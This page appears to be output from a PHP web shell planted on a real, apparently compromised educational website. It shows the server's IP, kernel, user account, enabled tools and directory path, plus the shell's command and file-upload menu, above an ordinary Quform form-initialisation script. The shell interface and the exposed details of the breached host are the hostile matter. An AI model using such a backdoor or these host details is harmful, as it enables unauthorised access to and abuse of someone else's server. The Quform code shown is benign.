Server IP : 192.185.129.71 / Your IP : 3.144.3.100 Web Server : Apache System : Linux bh-ht-3.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : svymadmin ( 4072) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home4/svymadmin/public_html/vivekaexcel.edu.in/bkp/assets/plugins/quform/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php /** * Quform initialisation * * You shouldn't need to change this file unless there is a problem */ // Prevent direct script access if ($_SERVER['REQUEST_METHOD'] != 'POST' || !defined('QUFORM_ROOT')) { exit; } if (version_compare(PHP_VERSION, '5.0.0', '<')) { die('Quform requires PHP 5 or later, the server is running version ' . PHP_VERSION); } // Enable error reporting if debug mode is on if (defined('QUFORM_DEBUG') && QUFORM_DEBUG) { error_reporting(E_ALL); @ini_set('display_errors', 'On'); } else { error_reporting(0); @ini_set('display_errors', 'Off'); } // Define constants defined('QUFORM_CHARSET') || define('QUFORM_CHARSET', 'UTF-8'); defined('QUFORM_UPLOAD_ERR_TYPE') || define('QUFORM_UPLOAD_ERR_TYPE', 128); defined('QUFORM_UPLOAD_ERR_FILE_SIZE') || define('QUFORM_UPLOAD_ERR_FILE_SIZE', 129); defined('QUFORM_UPLOAD_ERR_NOT_UPLOADED') || define('QUFORM_UPLOAD_ERR_NOT_UPLOADED', 130); defined('QUFORM_HTMLSPECIALCHARS_DOUBLE_ENCODE') || define('QUFORM_HTMLSPECIALCHARS_DOUBLE_ENCODE', version_compare(PHP_VERSION, '5.2.3', '>=')); // Include required libraries require_once QUFORM_ROOT . '/lib/PHPMailerAutoload.php'; require_once QUFORM_ROOT . '/lib/Quform.php'; Quform::registerAutoload(); // Instantiate the form $form = new Quform(); // Strip slashes from the posted data if magic quotes is on if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { $_POST = Quform::stripslashes($_POST); }